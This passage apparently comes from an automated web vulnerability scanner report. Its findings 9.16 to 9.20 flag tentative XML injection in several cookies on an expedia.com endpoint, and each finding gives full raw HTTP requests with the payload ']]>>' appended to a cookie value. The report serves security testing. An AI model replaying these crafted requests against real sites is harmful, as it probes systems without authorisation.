User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,]]>>; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:55:21 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX01F273B9C0$8F$98201000$DA$27$E96$E7b$9D$0D$E7b$9D$0D$E7b$9D$0D10001000$1E810$2302!50$91$83$FBQ$D1$9E$85N$8BJ$F5l!e02000`minfo=v.5,EX01ED6C112C$FB$24$DD$0C$C03$DBZz6I$A8p$99D$2A8$D8$0C$113$DEU$30$60$98o$E1$F1zq$B3$DE$EA$C23$1C$2B$D0$3EQ$A0$9CEf$C41$DB`264; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX01CF2CDB58$FB$24$DD$0C$DD3$DBGz1I$ACp$99D$288$D83$111$D1U$2C$60$9Co$D3`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`167; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.16. https://www.expedia.com/pub/agent.dll [ipsnf3 cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The ipsnf3 cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the ipsnf3 cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington]]>>; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:53:40 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX011BC4568E$85$98201000$D0$27$E96Bi$9D$0DBi$9D$0DBi$9D$0D10001000$1E810$2302!50$F7NTRJ$241eYyd$21!e02000`minfo=v.5,EX01CECA1537$FA$24$DD$0C$C4x9$19$7B$F1$35$60$ECz$3B$7E$33$E3i$12$22$D7$83$5E$0D$32UhpP$2F2$C1$35$0D$36$2A$F9$31sa$36$11$29$B8A$AB`257; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX0136B9D5EE$FA$24$DD$0C$D9x$11$1D$7B$F1$38$60$ECy$33$7B$33$E3p$12$22$DC$9D$5E70`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`175; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.17. https://www.expedia.com/pub/agent.dll [jscript cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The jscript cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the jscript cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1]]>>; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:55:06 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX01AB8D9FCA$CA$B9201000$D8$27$E96$9Ab$9D$0D$9Ab$9D$0D$9Ab$9D$0D10001000$1E810$2302!50$B2$F3$15$CA$D2$8C$8B$D4$1E$B5UH!e02000`minfo=v.5,EX01B2D316D2$FB$24$DD$0C$C03$DBZz9I$A1p$99I$288$D83$116$DEU$30$60$98o$E1$F1zq$B3$DE$EA$C33$11$2B$DB$3EQ$A0$9CEf$C41$DB`266; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX01D7F1CCA8$FB$24$DD$0C$DD3$DBGz1I$ACp$99K$218$D87$113$DEU$29$60$9Co$D3`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`167; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.18. https://www.expedia.com/pub/agent.dll [p1 cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The p1 cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the p1 cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98]]>>; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:55:35 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX017AC37230$EC$99201000$E3$27$E96$35e$9D$0D$35e$9D$0D$35e$9D$0D10001000$1E810$2302!50$AB$B9$D9w$CF$90$82$343$EC$CF$7D!e02000`minfo=v.5,EX0170B30D0C$FC$24$DD$0C$97$2Eksn5$2A6a$E0$60$95p$17$D6J$33G$F3$BE$FBQJ$A2$13$D1$7C$1B1$D7s$DC$E8$197i$36b$607$B7A$3D$AD0$5B151`275; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX011474DEDB$FC$24$DD$0C$8A$2Ekcn5$2D2a$E1$60$95k$17$D4J$38G$F3$BA$E4QJ$A1$13$D1O$1B1`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`180; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.19. https://www.expedia.com/pub/agent.dll [s1 cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The s1 cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the s1 cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95]]>>; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:55:40 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX014EC94B66$9E$BB201000$E3$27$E96Ke$9D$0DKe$9D$0DKe$9D$0D10001000$1E810$2302!50$AB$B9$D9w$B7$90$82$34$3EK$A3$9E!e02000`minfo=v.5,EX01DB5F03E4$FC$24$DD$0C$97$2Eksn5$25$0Fa$E1$60$95g$17$D2J$37G$F3$BE$FBQJ$A2$13$D1$7C$1B1$D7s$DC$E8$197i$36bp7$B7$5F$3D$AD0$5B151`271; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX0108842C1A$FC$24$DD$0C$8A$2Ekcn5$2D2a$EE$60$95u$17$D5J$32G$F3$BE$E0QJ$A1$13$D1O$1B1`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`180; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.20. https://www.expedia.com/pub/agent.dll [s_sess cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The s_sess cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the s_sess cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B]]>>
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:55:46 GMT
Connection: keep-alive
Connection: Transfer-Encoding
